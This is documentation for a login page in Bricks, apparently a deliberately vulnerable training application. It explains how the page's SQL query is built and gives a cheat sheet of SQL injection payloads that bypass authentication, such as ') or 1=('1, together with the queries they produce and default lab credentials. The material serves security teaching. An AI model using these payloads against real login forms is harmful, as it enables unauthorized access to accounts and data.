Bricks Documentation

Login page #3

  • Login page with user name and password verification.
  • Both user name and password field are prone to code injection.

Credentials for logging in normally
User name Password
admin admin
tom tom
ron ron

SQL injection.


Executed SQL query when username is tom and password is tom:
SELECT * FROM users WHERE name=('tom') AND password=('tom') LIMIT 0,1

When a user enters a user name and password, a SQL query is created and executed to search on the database to verify them. The above query searches in the users table where name is tom and password is tom. If matching entries are found, the user is authenticated.

In order to bypass this security mechanism, SQL code has to be injected on to the input fields. The code has to be injected in such a way that the SQL statement should generate a valid result upon execution. If the executed SQL query has errors in the syntax, it won't featch a valid result. So filling in random SQL commands and submitting the form will not always result in succesfull authentication.

Cheat sheet
User name Password SQL Query
tom tom SELECT * FROM users
WHERE name=('tom')
AND password=('tom')
LIMIT 0,1
tom ') or 1=('1 SELECT * FROM users
WHERE name=('tom')
AND password=('') OR 1=('1')
LIMIT 0,1
tom ') or 1=(1)-- - SELECT * FROM users
WHERE name=('tom')
AND password=('') OR 1=(1)-- -')
LIMIT 0,1
') or 1=('1 ') or 1=('1 SELECT * FROM users
WHERE name=('') OR 1=('1')
AND password=('') OR 1=('1')
LIMIT 0,1
') or 1=('1')-- - blah SELECT * FROM users
WHERE name=('') OR 1=('1')-- -')
and password=('blah')
LIMIT 0,1